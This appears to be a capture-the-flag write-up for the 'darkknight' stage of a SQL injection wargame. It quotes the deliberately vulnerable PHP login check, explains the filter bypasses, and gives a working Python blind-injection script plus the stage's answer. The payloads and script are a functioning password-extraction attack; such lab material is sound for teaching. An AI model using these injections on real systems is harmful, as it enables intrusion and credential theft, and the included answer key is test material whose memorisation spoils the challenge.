<?php 
  // Lord of SQL Injection "darkknight" stage: a deliberately vulnerable
  // login check. Both $_GET[pw] and $_GET[no] are interpolated directly into
  // SQL after a regex blacklist, so the blacklist is the only line of defence.
  // Bare array keys ($_GET[no], $_GET[pw]) rely on the undefined-constant
  // fallback to the string 'no'/'pw'; they should be quoted ($_GET['no']).
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  // Blacklist on `no`: "prob" (case-insensitive, blocks the table-name prefix),
  // "_", ".", and the literal "()".
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");  // prob (case-insensitive), _, ., () are filtered
  // Only the single quote is blocked in `pw`; `no` sits in a numeric context
  // with no quoting at all, so a double quote there is not rejected.
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");  // ' is filtered in pw
  // Blacklist on `no`: ', substr, ascii and =. Functionally equivalent SQL
  // (other comparison operators, other string functions) is not covered --
  // a keyword blacklist is not a substitute for prepared statements.
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");  // ', substr, ascii, = are filtered in no
  // Untrusted input concatenated into SQL (the intended flaw of this stage).
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  // @ silences mysqli errors, so the only signal the page returns is whether
  // a row came back ("Hello ..." below) -- a boolean oracle.
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  // Second query: pw is escaped with addslashes() before interpolation, but the
  // interpolation itself remains string-built. The comparison on the last line
  // uses loose == ; a strict comparison (or hash_equals) would be safer.
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

= 대신 like, ' 대신 ", substr 대신 mid 함수를 사용해서 우회했다.

import requests

# Challenge endpoint and session cookie for this LOS stage; the cookie value
# is a placeholder (Korean: "your own session id") to be replaced by the reader.
url='https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
cookie={'PHPSESSID':'자신의 세션 id'}
# Nibble alphabet used to reconstruct hex(pw) one hex digit at a time.
HEX='0123456789ABCDEF'

#16
def find_pw_len() -> int:
    """Determine the length of hex(pw) for the admin row.

    Sends one request per candidate length, using the presence of
    'Hello admin' in the response as a yes/no oracle; the loop has no
    upper bound and only stops on a hit. On the server side this pattern
    (many near-identical requests differing only in an incrementing
    number inside `no`) is the detection signature of blind probing.

    Returns: the length of hex(pw) as an int.
    """
    pw_len=1
    while True:
        r=requests.get(url+'?no=123 or id like "admin" and length(hex(pw)) like {}'.format(pw_len),cookies=cookie)
        if 'Hello admin' in r.text:
            return pw_len
        else:
            pw_len+=1
#0b70ea1f
def find_pw() -> None:
    """Recover the admin password one hex digit at a time and print it.

    For each position of hex(pw) (length from find_pw_len) it tries every
    nibble in HEX until the oracle string 'Hello admin' appears; every two
    recovered nibbles are decoded to one character and printed immediately.
    Worst case is 16 requests per nibble, which is why rate limiting and
    alerting on repeated boolean-only responses are effective mitigations.

    Returns: None (output is written to stdout).
    """
    pw_len=find_pw_len()
    tmp=''
    for i in range(1,pw_len+1):
        for j in HEX:
            r=requests.get(url+'?no=123 or id like "admin" and mid(hex(pw),{},1) like "{}"'.format(i,j),cookies=cookie)
            if 'Hello admin' in r.text:
                tmp+=j
                # Two nibbles form one byte of the original password.
                if len(tmp)==2:
                    print(chr(int(tmp,16)),end="")
                    tmp=''
                break
            
# Script entry point: prints the recovered password to stdout.
find_pw()

답: ?pw=0b70ea1f

